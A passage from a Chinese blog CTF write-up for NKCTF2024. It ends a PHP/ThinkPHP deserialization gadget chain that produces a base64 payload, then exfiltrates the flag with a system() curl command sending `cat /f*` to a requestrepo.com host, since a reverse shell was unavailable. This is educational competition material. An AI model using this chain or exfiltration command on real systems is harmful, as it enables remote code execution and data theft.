class="hljs-comment">//include(&quot;./&quot;.$arguments[0][&#x27;name&#x27;]);是根据当前目录来的。</span><br>  <span class="hljs-keyword">protected</span> <span class="hljs-variable">$data</span> = [];<br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-variable language_">$this</span>-&gt;data[<span class="hljs-string">&#x27;Loginout&#x27;</span>]=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">config</span>();         <span class="hljs-comment">//config类里的__call方法</span><br>  &#125;<br>&#125;<br><br><br><span class="hljs-keyword">use</span> <span class="hljs-title">think</span>\<span class="hljs-title">process</span>\<span class="hljs-title">pipes</span>\<span class="hljs-title">Windows</span>;         <span class="hljs-comment">//不写会报错</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">Windows</span>()));<br></code></pre></td></tr></table></figure>

<p>得到payload后开始执行命令：</p>
<p><img src="/img/NKCTF2024/24.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>这道题好像是无回显。</p>
<p>经过测试，好像没有bash和nc，反弹shell行不通，可能这道题不出网，那么就curl+DNS外带。</p>
<p>在线dns网站：<a target="_blank" rel="noopener" href="https://requestrepo.com/#/requests">https://requestrepo.com/#/requests</a></p>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey">system(<span class="hljs-string">&quot;curl -X POST --data `cat%20/f*` http://b62zii2y.requestrepo.com&quot;</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/NKCTF2024/25.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/26.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/27.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>最后一个题不错，其他题挺水的</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/WPs/" class="category-chain-item">WPs</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/WPs/" class="print-no-link">#WPs</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>NKCTF2024</div>
      <div>http://example.com/2024/03/25/NKCTF2024/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Infernity</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月25日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/29/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E2%80%94%E2%80%94URLDNS%E9%93%BE/" title="java反序列化——URLDNS链">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">java反序列化——URLDNS链</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/19/DubheCTF-2024/" title="DubheCTF_2024">
                        <span class="hidden-mobile">DubheCTF_2024</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>





  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
